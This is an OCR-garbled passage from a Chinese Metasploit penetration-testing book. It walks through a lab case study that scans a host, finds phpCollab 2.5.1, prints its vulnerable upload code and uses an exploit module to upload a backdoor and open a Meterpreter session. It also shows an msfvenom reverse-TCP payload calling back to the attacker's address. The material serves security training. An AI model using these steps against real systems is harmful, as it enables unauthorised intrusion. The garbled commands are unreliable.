速 切换 攻击 载荷 模块 。 

















因而 在 Metasploit 中 从 Meterpreter 终端 或 者 shell 控制 行 可 以 十 分 简单 地 转换 到 


具体 的 操作 ， 例 如 添加 一 个 用 户 ， 获 得 远程 桌面 控制 。 在 命令 行 中 输入 msfvenom 也 可 以 很 容易 地 创 
建 一 个 人 工 攻击 代码 程序 。 
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控制 通道 时 却 可 能 会 引起 系统 的 崩溃 。 这 确实 是 一 个 重要 的 问题 ， 在 这 种 情况 下 ， 我 们 都 知道 系统 是 

















.5.4 干净 的 通道 建立 方式 
































Metasploit 可 以 在 目标 计算 机 上 不 留 痕迹 地 建立 控制 通道 ， 而 一 个 自 定义 编码 的 渗透 模块 在 建立 



































不 会 立刻 重新 启动 的 。 
设想 这 样 一 个 场景 :我 们 已 经 拿 下 了 一 个 Web 服务 器 ,在 准备 建立 通道 的 时 候 目标 服务 却 崩 溃 了 。 
这 人 台 服 务 器 的 计划 维护 时 间 是 在 50 天 以 后 。 那 现在 该 做 什么 呢 ? 熬 过 接 下 来 的 50 天 直到 目标 服务 再 
次 启动 ， 以 便 再 一 次 入 侵 ?再 者 ， 如 果 再 次 启动 的 时 候 ， 目 标 系统 的 漏洞 已 经 修复 了 怎么 办 ? 我 们 只 
















































































有 上 暗自 郁 间 了 。 因此 , 更 好 的 办 法 就 是 使 用 Metasploit 框架 。Metasploit 在 建立 控制 通道 方面 极为 优秀 ， 


同时 还 提供 了 大 量 的 后 渗透 测试 模块 ， 例 如 persistenc 
































控制 通道 。 


1 


1 


5.5 图形 化 管理 表面 














命令 就 可 以 建立 一 个 对 目标 服务 器 的 持久 


Metasploit 提供 了 一 个 漂亮 的 图 形 化 管理 界面 ， 男 外 也 为 第 三 方 图 形 化 管理 软件 ( 例如 Armitage ) 
提供 了 管理 界面 。 这 些 界面 极 大 地 简化 了 渗透 测试 的 工作 ， 提 供 了 易于 切换 的 工作 平台 、 漏 洞 管理 、 
单 击 鼠 标 即 可 完成 的 渗透 功能 。 本 书 的 后 面 几 章 将 详细 讨论 这 些 环 境 。 





6 ”案例 研究 : 渗透 进入 一 个 未 知 网 络 





回顾 完 Metasploit 的 基本 操作 ， 该 开始 Metasploit 渗透 之 旅 了 。 我 们 设想 这 样 一 个 场景 客户 提 








f 











t 给 我 们 一 个 IP 地址 , 并 要 求 测试 它 能 否 防御 住 攻击 。 这 个 测试 的 唯一 目的 就 是 确保 所 有 应 有 的 检查 











者 








的 工作 。 


(» 如 果 你 想 在 阅读 案例 研究 的 同时 进行 实践 操作 ,可 以 参阅 17 35, 


网 络 和 配置 细节 来 帮助 你 完成 整个 案例 的 研究 。 




















已 经 到 位 。 这 个 场景 很 简单 。 假 定 所 有 前 期 交互 阶段 的 工作 都 由 客户 完成 ,我 们 直接 开始 测试 阶段 

















该 节 会 给 出 精确 的 
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1.6.1 ”信息 收集 














正如 前 文 所 介绍 的 那样 ,在 信息 收集 阶段 应 该 围绕 着 目标 收集 尽 可 能 多 的 相关 信息 。 主 动 扫描 和 














被 动 扫描 包括 了 端口 扫描 、banner 获取 ， 以 及 根据 被 测试 的 目标 特点 选择 的 各 种 




















其 他 扫描 方式 。 当 前 











场景 中 , 我 们 要 测试 的 目标 是 一 个 卫 地址 。 因 此 在 这 次 测试 中 可 以 跳 过 被 动 扫 描 , 直接 采用 主动 扫描 








的 方法 开始 收集 信息 。 














我 们 采用 对 内 部 目标 踩点 的 方法 ， 主 要 包括 端口 扫描 技术 、bpanner 获取 技术 、ping 扫描 技术 (CH 





的 是 验证 目标 主机 是 否 在 线 ) 以 及 服务 扫描 技术 。 


























Nmap 被 证 明 是 最 适合 进行 内 部 目标 踩点 的 工具 之 一 。 由 Nmap 生成 的 报告 可 以 轻松 地 导入 到 
Metasploit 中 。Metasploit 内 置 了 数据 库 功 能 ,利用 这 个 功能 我 们 就 能 在 Metasploit 中 执行 Nmap 扫描 ， 

















并 将 扫描 结果 存储 在 数据 库 中。 





有 关 Nmap 扫描 的 更 多 信息 ， 请 访问 http://nmap.org/bennieston-tutorial/。 


€ 推荐 一 本 关于 Nmap 的 优秀 图 书 : http//www.packtpub.com/networking-and-servers/nmap- 


6-network-exploration-and-security-auditing-cookbook。 


在 Metasploit 中 使 用 数据 库 


将 渗透 测试 的 结果 自动 保存 起 来 是 一 个 不 错 的 选择 。 这 将 帮助 我 们 建立 关于 这 次 渗透 测试 的 知识 








库 。 为 了 实现 这 个 功能 ， 可 以 使 用 Metasploit 内 置 的 数据 库 。 将 Metasploit 与 数据 库 建立 连接 可 以 加 








快 搜索 的 速度 ， 缩 短 响应 的 时 间 。 下 图 给 出 了 一 个 没有 与 数据 库 连 接 时 的 情形 。 








msf > search ping 


Module database cache not built yet, using slow search 





在 安装 阶段 ， 我 们 已 经 看 到 了 如 何 为 Metasploit 初始 化 数据 库 以 及 如 何 启动 这 个 数据 库 。 现 在 ， 























为 了 检测 当前 Metasploit 是 否 与 数据 库 相 连 ， 需 要 输入 ab_status 命令 ， 如 下 面 的 屏幕 截图 所 示 。 
msf > db status 
[*] postgresql connected to msf 
msf > db_ 
db_connect db import db status 
db disconnect db nmap 
db export db rebuild cache 











在 一 些 特殊 情况 下 ， 我 们 会 希望 连接 到 特殊 的 数据 库 而 不 是 默认 的 Metasploit 数据 库 。 这 时 ， 需 


a 








要 使 用 ab_connect 命令 ， 如 下 图 所 示 。 














msf > db_connect -h 
[*] Usage: db connect «user:pass»Q«host:port»/«database» 


[*1 OR: db connect -y [path/to/database.yml] 

[*] Examples: 

[*] db connect usergmetasploit3 

[*] db connect user:pass192.168.0.2/metasploit3 


[*] db connect user:passQ192.168.0.2:1500/metasploit3 
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如 果 要 连接 到 某 个 数据 库 , 在 使 用 ab connect 命令 时 还 需要 提供 用 户 名 、 密 码 以 及 端口 号 、 数 
据 库 名 等 信息 。 


来 看 看 其 他 核心 数据 库 操作 命令 是 如 何 工作 的 。 下 表 有 助 于 了 解 这 些 数 据 库 命令 。 


命 令 用 B 

































































db connect 用 来 与 默认 数据 库 之 外 的 数据 库 交 互 

db export 用 来 将 数据 库 中 保存 的 数据 导出 ， 用 来 生成 测试 报告 或 者 用 来 导入 到 其 他 安全 工具 中 
db nmap 用 来 使 用 Nmap 软 件 对 目标 进行 扫描 ， 并 将 结果 保存 到 Metasploit 的 数据 库 中 

db status 用 来 检查 是 否 建 立 了 与 数据 库 的 连接 

db. disconnect 用 来 从 指定 的 数据 库 中 断 开 

db import 用 来 向 数据 库 中 导入 来 自 其 他 扫描 工具 〈 例 如 Nessus、Nmap 等 ) 的 扫描 结果 

db rebuild cache 用 来 重新 建立 缓存 ， 主 要 目的 是 使 用 新 的 配置 赫 代 之 前 缓存 文件 中 错误 或 者 过 时 的 配置 














在 开始 一 次 新 的 渗透 测试 时 ， 最 好 将 先前 扫描 的 主机 数据 与 这 次 的 数据 分 别 存储 ， 这 样 两 者 就 不 
会 混在 一 起 。 可 以 通过 在 Metasploit 中 使 用 workspace 命令 来 完成 此 操作 ， 如 下 图 所 示 ， 但 是 要 记 
住 这 一 切 需要 在 新 的 渗透 测试 操作 开始 之 前 进行 。 




















msf > workspace -h 

Usage: 
workspace List workspaces 
workspace -v List workspaces verbosely 
workspace [name] Switch workspace 
workspace -a [name] ... Add workspace(s) 
workspace -d [name] ... Delete workspace(s) 
workspace -D Delete all workspaces 
workspace -r «old» «new» Rename workspace 
workspace -h Show this help information 








可 以 通过 输入 workspace -a 命令 和 一 个 标识 符 来 添加 一 个 新 的 工作 区 。 我 们 可 以 使 用 当前 正在 
评估 的 机 构 名 称 作为 标识 符 ， 如 下 图 所 示 。 

















msf > workspace -a AcmeTest 
Added workspace: AcmeTest 
> workspace AcmeTest 
Workspace: AcmeTest 

















现在 已 经 通过 参数 -a 成 功 地 创建 了 一 个 新 的 工作 区 。 如 果 需 要 在 多 个 工作 区 之 间 进 行 切换 ， 也 
可 以 使 用 workspace 命令 加 上 工作 区 的 名 字 来 实现 ， 如 上 图 所 示 。 完 成 了 对 工作 空间 的 选择 之 后 ， 
我 们 对 目标 IP 进行 一 次 快速 的 Nmap 扫描 ， 看 看 是 否 能 找到 一 些 可 以 利用 的 服务 。 


msf > db_nmap -S9 192.168.174.132 

[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-26 13:07 IST 
[*] Nmap: Nmap scan report for 192.168.174.132 

[*] Nmap: Host is up (0.0064s latency). 

[*] Nmap: Not shown: 999 closed ports 

[*] Nmap: PORT STATE SERVICE 

[*] Nmap: 80/tcp open http 

[*] Nmap: MAC Address: 00:0C:29:81:AE:B9 (VMware) 

[*] "P Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds 

msf » 
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这 个 扫描 结果 有 点 令 人 泪 丧 ， 除 了 80 端口 之 外 ， 在 目标 上 没有 其 他 端口 在 运行 服务 。 
默认 情况 下 , Nmap 只 会 扫描 目 标 主机 上 最 常用 的 1000 个 端 n, 不 过 我 们 可 以 使 用 
参数 -p 来 扫描 目标 的 全 部 65 535 个 端口 。 

现在 已 经 连接 到 了 Metasploit 的 数据 库 ， 我 们 全 部 的 检查 结果 都 将 保存 在 这 个 数据 库 中 。 输 入 


services 命令 可 以 查看 数据 库 中 所 有 的 扫描 服务 。 另 外 ， 我 们 使 用 命令 ab_nmap 并 添加 参数 -sv 
来 执行 一 次 版 本 扫描 ， 这 个 过 程 如 下 图 所 示 。 


msf > services 





























host port proto name state info 


192.168.174.132 80 tcp http open 


msf > db_nmap -sV -p80 192.168.174.132 

] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-26 13:08 IST 
] Nmap: Nmap scan report for 192.168.174.132 

] Nmap: Host is up (0.00059s latency). 

] Nmap: PORT STATE SERVICE VERSION 

] Nmap: 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 

] Nmap: MAC Address: 00:0C:29:81:AE:B9 (VMware) 
] 
s 
] 
f 





Nmap: Service detection performed. Please report any incorrect results at ht 
://nmap.org/submit/ . 

Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds 

» services 


host port proto name state info 


192.168.174.132 80 tcp http open Apache httpd 2.4.7 (Ubuntu) 

















前 面 的 Nmap 扫描 发 现 目标 开放 了 80 端口 , 并 将 这 个 结果 保存 在 了 数据 库 中 。 接 下 来 的 版 本 扫描 
中 发 现 了 目标 的 80 端口 上 运行 的 是 Apache 2.4.7 Web 服务 器 ， 同 时 也 扫描 出 了 目标 的 MAC 地 址 和 操 
作 系 统 类 型 ， 并 在 数据 库 中 更 新 了 这 些 内 容 ， 如 上 图 所 示 。 由 于 获取 访问 权限 需要 确定 目标 上 所 运行 
软件 的 精确 版 本 信息 ， 所 以 最 好 对 这 个 版 本 信息 进行 二 次 检查 。Metasploit 中 内 置 了 一 个 用 于 识别 
HTTP 服务 器 版 本 信息 的 辅助 模块 ， 我 们 来 利用 它 ， 如 下 图 所 示 。 


msf > use auxiliary/scanner/http/http_version 
msf auxiliary(http version) > show options 

























































































Module options (auxiliary/scanner/http/http version): 


Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,t 
ype:host:port][...] 

RHOSTS yes The target address range or CIDR identifi 
er 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connection 
s 

THREADS 1 yes The number of concurrent threads 

VHOST no HTTP server virtual host 


msf auxiliary(http version) > set RHOSTS 192.168.174.132 
RHOSTS -» 192.168.174.132 

msf auxiliary(http version) > set THREADS 10 

THREADS -» 10 

msf auxiliary(http version) » run 
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下 面 要 启动 nttp_version 扫描 器 模块 了 , 在 命令 行 中 输入 use 命令 加 上 这 个 模块 所 在 的 路 径 ， 
本 例 中 路 径 的 值 为 auxiliary/scanner/http/http_version。 所 有 基于 扫描 功能 的 模块 都 有 
RHOSTS 选项 ， 这 个 选项 的 值 可 以 是 一 系列 的 TP 地 址 或 者 子 网 。 不 过 本 例 中 只 需要 测试 单个 IP 目标 ， 
因此 只 需要 使 用 set 命令 将 其 设置 为 192.168.174.132。 接 下 来 ， 使 用 run 命令 来 执行 这 个 模块 ， 如 
下 图 所 示 。 


























msf auxiliary(http version) > run 


192.168.174.132:80 Apache/2.4.7 (Ubuntu) 
[*] Scanned 1 of 1 hosts (100* complete) 
[*] Auxiliary module execution completed 
msf auxiliary(http version) » 





这 里 显示 的 Apache 版 本 信息 与 之 前 的 Nmap 扫描 结果 一 样 。 这 个 版 本 的 Apache 是 安全 的 ， 我 们 
在 exploit-db.com 和 0day .today 这 些 渗 透 模 块 库 中 都 找 不 到 关于 它 的 信息 。 因 此 我 们 只 剩 下 在 
Web 程序 中 查找 漏洞 这 一 个 途径 了 。 现 在 首先 浏览 这 个 IP 地 址 的 页 面 ， 查 看 是 否 可 以 得 到 些 有 用 的 
信息 。 























Mozilla Firefox (Build 20170809204109) ooo0 
http://192.168.174.132/ xc 
€ © 192.168.174.132 e | @ a Search *t6 4$ 19v; z 


£3 Most Visltedv BilOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools ʻe. Exploit-DB W Aircrack-ng BKali Forums ‘Ñ NetHunter @ Getting Started 
rity pl 9 9 











好 了 ， 现 在 我 们 可 以 看 到 一 个 空白 的 主页 。 接 下 来 就 可 以 使 用 Metasploit 中 的 air scanner 模 
块 来 寻找 一 些 已 知 目录 ， 如 下 图 所 示 。 
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root@kali: ~ 
File Edit View Search Terminal Help 


Imsf > use auxiliary/scanner/http/dir_scanner 
msf auxiliary(dir scanner) > show options 


Module options (auxiliary/scanner/http/dir scanner): 


Name Current Setting 
Description 


DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap dirs.txt 
Path of word dictionary to use 

PATH / 
The path to identify files 

Proxies 
A proxy chain of format type:host:port[,type:host:port][...] 
RHOSTS 192.168.174.132 
The target address range or CIDR identifier 

RPORT 80 
The target port (TCP) 

SSL false 

Negotiate SSL/TLS for outgoing connections 

THREADS 1 


Required 





VHOST 


THREADS => 





20 


HTTP server virtual host 


msf auxiliary(dir_scanner) > | | 


The number of concurrent threads 


no 


msf auxiliary(dir scanner) > set DICTIONARY /root/Desktop/raft-medium-directorie 
s-lowercase.txt 

DICTIONARY -» /root/Desktop/raft-medium-directories-lowercase.txt 

msf auxiliary(dir scanner) > set THREADS 20 


在 Metasploit 中 载 人 auxiliary/scanner/http/dir scanner 模块 之 后 ， 


DICTIONARY 参数 指定 一 
个 过 程 的 话 ， 可 以 将 THRI 





我 们 需要 使 用 




















[*] Using 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 
Found 





code 


http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
[*] Scanned 1 of 1 hosts 
[*] Auxiliary module execution completed 
msf auxiliary(dir scanner) > $ 


'404' 


//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 
//192. 


[*] Detecting error code 


as not found for 192.168.174.132 


168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 


168 


168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 


174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
.174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 
174. 


132 


132 
132 
132 
132 


132 
132 


132 


132 
132 
132 
132 
132 
132 
132 
132 
132 


:80/icons/ 404 (192.168.174.132) 
132: 
132: 
132: 


80/reports list/ 404 (192.168.174.132) 
80/external files/ 404 (192.168.174.132) 
80/style library/ 404 (192.168.174.132) 


:80/server-status/ 404 (192.168.174.132) 
:80// 200 (192.168.174.132) 

:80/neuf giga photo/ 404 (192.168.174.132) 
:80/modern mom/ 404 (192.168.174.132) 

132: 
132: 


80// 200 (192.168.174.132) 
80/web references/ 404 (192.168.174.132) 


:80/my project/ 404 (192.168.174.132) 
132: 


80/contact us/ 404 (192.168.174.132) 


:80/phpcollab/ 302 (192.168.174.132) 
132: 
132: 
132: 
132: 


80/donate cash/ 404 (192.168.174.132) 
80/home page/ 404 (192.168.174.132) 
80/press releases/ 404 (192.168.174.132) 
80/privacy policy/ 404 (192.168.174.132) 


:80/planned giving/ 404 (192.168.174.132) 
132: 


80/site map/ 404 (192.168.174.132) 


:80/about us/ 404 (192.168.174.132) 
:80/bequest gift/ 404 (192.168.174.132) 
:80/gift form/ 404 (192.168.174.132) 
:80/life income gift/ 404 (192.168.174.132) 
180/new folder/ 404 (192.168.174.132) 
:80/site assets/ 404 (192.168.174.132) 
:80/what is new/ 404 (192.168.174.132) 
:80/error[f]log/ 404 (192.168.174.132) 
:80/phpcollab/ 302 (192.168.174.132) 


(100% complete) 








个 字典 文件 ， 在 这 个 文件 中 包含 大 量 的 已 知 目录 。 男 外 ， 如 果 你 希望 加 快 整 
EADS 的 值 从 1 调整 为 20。 下 面 就 是 这 个 模块 执行 的 过 程 以 及 输出 。 
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各 个 目录 之 间 的 空格 符 可 能 会 导致 不 真实 结果 的 出 现 。 在 使 用 phpcollab 作为 参数 时 得 到 的 结果 
为 302， 这 也 就 是 说 在 试图 访问 phpcollab 目录 时 ,我 们 得 到 了 一 个 重 定向 响应 (302 )。 这 个 响应 很 有 
趣 ， 不 妨 尝试 在 浏览 器 中 打开 这 个 目录 ， 看 看 会 得 到 什么 结果 。 














PhpCollab - Mozilla Firefox (Build 20170809204109) ooo0 
| / PhpCollab x 
EB O A | 192.168.174.132/phpcollab/general/login.ph; | C MEO, Search. 2> | 三 
Ex Most Visitedv fll Offensive Security Ñ Kali Linux WKali Docs ™ Kali Tools (€. Exploit-DB » 
PhpCollab 


LogIn System Requirements License 


PhpCollab : Log In 











Please log in 





Language 


* Password 


PhpCollab v2.5.1 





* User Name : 





:| English v | 























Log In | 


Forgot password ? 











干 得 漂亮 , 我 们 在 目标 系统 中 发 现 了 一 个 基于 PHP 的 应 用 程序 。 由 于 这 个 程序 的 存在 , Metasploit 





模块 得 到 了 一 个 302 响应 。 


1.6.2 威胁 建 模 


通过 信息 收集 ， 可 知 目标 计算 机 上 只 开放 了 80 端口 ， 并 且 没 有 针对 这 个 端口 上 所 运行 程序 的 渗 


透 模块 ， 不 过 我 们 发 现在 这 个 服务 器 上 运行 着 一 个 PhpCollab Web 应 用 程序 。 为 了 获得 这 个 程序 的 控 


H 





Ti 





由 权限 ， 我 们 尝试 了 一 些 常用 用 户 名 和 密码 的 组 合 ， 但 是 都 没有 成 功 。 而 且 我 们 在 Metasploit 中 也 找 


不 到 PhpCollab 的 相关 模块 。 





msf > search PhpCollab 


msf > F 
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下 面 使 用 searchsploit 工具 在 https://exploit-db.com/ 中 查找 与 PhpCollab 有 关 的 模块 。 这 个 工 上 
允许 你 从 本 地 的 渗透 模块 数据 库 副本 中 查找 要 使 用 的 模块 。 


root@kali:~/Desktop# searchsploit phpcollab 2.5.1 








Exploit Title 
| Path 


| (/usr/share/exploitdb/) 


phpCollab 2.5.1 - Arbitrary File Upload 

| exploits/php/webapps/42934.md 

phpCollab 2.5.1 - SQL Injection 

| exploits/php/webapps/42935.md 

phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit) 
| exploits/php/remote/43519.rb 


Shellcodes: No Result | 
root@kali:~/Desktop# 




















~ 


看 起 来 一 切 都 很 顺利 ， 我 们 已 经 找到 了 针对 PhpCollab 的 渗透 模块 。 另 外 一 个 好 消息 是 ， 这 里 还 


有 一 个 可 以 直接 在 Metasploit 中 使 用 的 模块 。 


1.6.3 ”漏洞 分 析 一 一 任意 文件 上 传 〈 未 经 验证 ) 


PhpCollab 应 用 程序 并 没 能 准确 地 实现 对 上 传 文件 的 内 容 进行 过 滤 。 因 此 ， 未 经 身份 验证 的 攻 避 
者 可 以 上 传 恶意 文件 并 运行 任意 代码 。 


PhpCollab 2.5.1 中 漏洞 产生 的 原理 
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LT 


如 果 攻 击 者 通过 /clients/editclient.php?id=1&action=update 的 URL 发 送 一 个 包含 PHP 恶意 文件 的 
































POST 请 求 , 那么 PhpCollab 应 用 程序 就 会 因此 而 被 渗透 。 这 个 程序 的 代码 并 没有 验证 该 请 求 是 否 来 自 














授权 用 户 。 有 问题 的 代码 如 下 所 示 。 











$extension = strtolower( substr( strrchr($ FILES['upload']['name'], ".") ,1) ); 
if(Qgmove uploaded file($ FILES['upload']['tmp name'], "../1logos clients/".$id.".$exte 
nsion")) 
1 

chmod("../logos clients/".$id.".$extension",0666); 

$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension logo-'$extensio 
n' WHERE id-'$id'"; 

connectSql("$tmpquery"); 
i 








从 第 二 行 代码 中 可 以 看 出 ， 上 传 的 文件 都 会 被 保存 在 logos clients 目录 中 ， 并 会 重新 以 Sid 和 
Sextention 命名 ， 这 表示 如 果 URL 中 id 的 值 为 1， 那么 通过 这 个 URL 上 传 的 后 门 文件 就 会 以 1.php 为 











名 保存 在 日 录 logos_clients 中 。 
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如 果 需 要 获得 关于 此 模块 的 更 多 信息 ， 可 以 访问 https//sysdream.com/news/lab/2017- 
09-29-cve-2017-6090-phpcollab-2-5-1-arbitraryfile-upload-unauthenticated/。 


1.6.4 ”渗透 与 控制 


为 了 获取 目标 的 控制 权限 ， 需 要 将 这 个 渗透 模块 复制 到 Metasploit 中 。 不 过 ， 直 接 将 外 部 的 渗透 
模块 复制 到 Metasploit 的 exploit 目录 中 并 不 是 一 种 明智 的 做 法 ， 因 为 每 当 Metasploit 进行 更 新 操作 时 
都 会 导致 该 模块 被 删除 。 因 此 将 这 个 渗透 模块 放 在 一 个 通用 目录 中 要 比 放 在 Metasploit 的 模块 目录 中 
更 为 明智 。 可 以 在 操作 系统 的 其 他 位 置 建立 一 个 目录 来 保存 这 些 模 块 ， 当 需要 使 用 这 些 模块 时 ， 就 使 
用 1oadpath 命令 来 加 载 它 们 。 现 在 先 将 找到 的 这 个 模块 复制 到 某 个 目录 中 。 


root@kali:~/Desktop# cp /usr/share/exploitdb/exploits/php/remote 
/43519.rb /root/Desktop/MyModules/ 


接 下 来 按照 下 图 所 示 的 结构 来 创建 目录 。 


root@kali:~/Desktop/MyModules# ls 

43519.rb 

root@kali:~/Desktop/MyModules# mkdir modules 
root@kali:~/Desktop/MyModules# cd modules/ 
root@kali:~/Desktop/MyModules/modules# mkdir exploits 
root@kali:~/Desktop/MyModules/modules# cd exploits/ 
root@kali:~/Desktop/MyModules/modules/exploits# mkdir nipun 
root@kali:~/Desktop/MyModules/modules/exploits# cd nipun 
root@kali:~/Desktop/MyModules/modules/exploits/nipun# cp ../../../43519.rb . 
rootékali:-/Desktop/MyModules/modules/exploits/nipun£ ls 
43519. rb 
root@kali:~/Desktop/MyModules/modules/exploits/nipun# 




































































我 们 在 MyModules 文件 夹 中 创建 了 一 个 兼容 Metasploit 的 目录 结构 ， 本 例 中 为 modules/exploits/ 
nipun， 然 后 将 这 个 模块 复制 到 了 该 目录 中 。 然 后 按照 下 图 所 示 在 Metasploit 中 载 人 这 个 目录 。 








msf > loadpath /root/Desktop/MyModules/modules 
Loaded 1 modules: 
1 exploit 


我 们 已 经 成 功 地 在 Metasploit 中 载 人 了 这 个 模块 。 下 面 就 可 以 使 用 这 个 模块 了 ， 如 下 图 所 示 。 


msf > use exploit/nipun/43519 
msf expLoit(43519) > show options 


























Module options (exploit/nipun/43519): 


Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOST yes The target address 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

TARGETURI  /phpcollab/ yes Installed path of phpCollab 

VHOST no HTTP server virtual host 


Exploit target: 


Id Name 


0 Automatic 
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这 个 模块 需要 我 们 指定 远程 目标 主机 的 IP 地址 、 端 口号 ， 以 及 访问 PhpCollab 应 用 程序 的 路 径 。 
默认 情况 下 ， 路 径 (TARGETURI ) 和 远程 端口 号 ( RPORT ) 的 值 都 已 经 设 定 完毕 ， 所 以 我 们 只 需要 将 
RHOST 的 值 设 定 为 目标 主机 的 IP 地址 ， 然 后 输入 exploit 命令 。 

















msf exploit(43519) > set RHOST 192.168.174.132 
RHOST -» 192.168.174.132 
msf exploit(43519) » exploit 


[*] Started reverse TCP handler on 192.168.174.128:4444 
[*] Uploading backdoor file: l.kRhbfrrv.php 
Backdoor successfully created. 
] Triggering the exploit... 
] Sending stage (37514 bytes) to 192.168.174.132 
Deleted l.kRhbfrrv.php 





meterpreter > lj 


太 棒 了 ， 我 们 成 功 完成 了 对 目标 的 控制 。 接 下 来 就 可 以 发 挥 那些 基本 的 后 涂 透 命令 的 作用 了 ， 然 
后 再 分 析 这 些 命令 执行 的 结果 ， 如 下 图 所 示 。 





























meterpreter > sysinfo 

Computer : ubuntu 

os : Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86 64 
Meterpreter : php/linux 

meterpreter » 














正如 上 图 所 示 , 使 用 sysinfo 命令 可 以 获取 目标 的 系统 信息 ， 例 如 计算 机 名 、 操 作 系 统 类 型 、 
系统 结构 (64-bit )， 以 及 当前 使 用 的 Meterpreter 版 本 (基于 PHP )。 通 过 使 用 sneil 命令 ， 可 以 使 用 
系统 自身 的 shell 来 控制 被 渗透 主机 ， 如 下 图 所 示 。 


meterpreter > shell 

Process 8167 created. 

Channel 0 created. 

id 

uid-33(www-data) gid-33(www-data) groups-33(www-data) 
pwd 

/var/www/html/phpcollab/logos clients 

lsb release -a 

Distributor ID: Ubuntu 


























Description: Ubuntu 14.04 LTS 
Release: 14.04 
Codename: trusty 


No LSB modules are available. 


可 以 看 到 ,一 旦 进入 系统 shell ， 就 可 以 使 用 其 中 的 命令 了 。 例 如 ，ia 命令 可 以 显示 当前 用 户 的 
一 些 信息 ,www-aata 表示 如 果 想 要 彻底 控制 当前 系统 就 必须 取得 root 权限 。 另 外 , 键 人 lsb_release 
-a 命令 可 以 显示 操作 系统 版 本 的 release 和 codename 详细 信息 。 仔细 观察 这 些 内 容 ， 因 为 在 获取 系统 
的 root 权限 时 会 用 得 上 它们 。 在 进入 root 获取 阶段 之 前 , 我 们 先 来 查看 目标 系统 上 的 一 些 信息 。 例如 ， 
使 用 getpia 命令 来 查看 当前 的 进程 ID, 使 用 gecuia 命令 来 查看 当前 的 用 户 ID, 使 用 uuid 来 查看 
用 户 标识 符 , 使 用 machine_id 来 查看 被 渗透 主机 的 机 器 标识 符 。 现 在 运行 刚刚 提 到 的 所 有 命令 ,并 
分 析 它 们 的 执行 结 
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meterpreter » getpid 
Current pid: 8009 
meterpreter » getuid 
Server username: www-data (33) 
meterpreter » uuid 
UUID: 149696aa7e683f94/php-15/linux-6/2018-01-26T10:01:10Z 
meterpreter » machine id 
Machine ID: 167cda8ab6ad863c1033a5987acd5dbb 
meterpreter > Bj 


我 们 所 获得 的 这 些 信息 都 是 比较 简单 直接 的 , 包括 Meterpreter 所 依靠 的 进程 ID 、 HJ ID, UUID 
以 及 机 器 ID 。 不 过 有 一 点 需要 注意 ， 我 们 当前 的 控制 是 基于 PHP Meterpreter 的 ， 由 于 它 的 局 限 我 们 
不 能 运行 特权 命令 。 而 如 果 你 使 用 的 是 二 进 制 Meterpreter shell， 例 如 reverse TCP 的 话 ， 就 可 以 轻 而 
易 举 地 执行 这 些 命令 。 首 先 ， 我 们 升级 到 一 个 高 级 一 些 的 shell， 以 此 来 获得 更 高 的 目标 控制 权限 。 我 
们 使 用 msfvenonm 命令 来 创建 一 个 恶意 的 payload， 并 将 它 上 传 到 目标 系统 然后 执行 。 现 在 开始 吧 ! 


rootékali:-£ msfvenom -p linux/x64/meterpreter/reverse tcp LHOST-19 
2.168.174.128 LPORT-4443 -f elf -b 'Ax00' »reverse connect.elf 
No platform was selected, choosing Msf::Module::Platform::Linux fro 
m the payload 

No Arch selected, selecting Arch: x64 from the payload 

Found 2 compatible encoders 

Attempting to encode payload with 1 iterations of generic/none 
generic/none failed with Encoding failed due to a bad character (in| 
dex-56, char-z0x00) 

Attempting to encode payload with 1 iterations of x64/xor 

x64/xor succeeded with size 167 (iteration-0) 













































































x64/xor chosen with final size 167 
Payload size: 167 bytes 
Final size of elf file: 287 bytes 


rootGkali:-£ pwd 


/root 

rootékali:-£ ls 

Desktop Pictures Videos des-bruteforce 
Documents Public access-logs hashes 

Downloads RsaCtfTool change.py reports 

Music Templates | cisco-index.html reverse connect.elf 





rootékali:-4$ 


考虑 到 要 渗透 的 主机 采用 了 64 位 的 系统 架构 ， 因 此 我 们 也 使 用 64 位 版 本 的 Meterpreter， 如 上 图 
所 示 。 使 用 MSFvenom 工具 来 生成 符合 我 们 需求 的 payload。 在 这 个 工具 中 使 用 参数 -p 来 指定 要 使 用 
的 payload, 本 例 中 就 是 linux/x64/meterpreter/reverse_tcp。 这 个 payload 可 以 在 64 位 Linux 系统 上 运行 ， 
当 其 在 被 渗透 的 主机 上 启动 之 后 ， 就 会 主动 连接 到 我 们 的 监听 器 ， 并 提供 一 个 对 该 主机 的 控制 权限 。 
1 于 这 个 payload 需要 连接 到 我 们 的 计算 机 ， 所 以 它 必须 知道 回 连 的 地 址 。 为 此 我 们 指定 了 LosT 和 
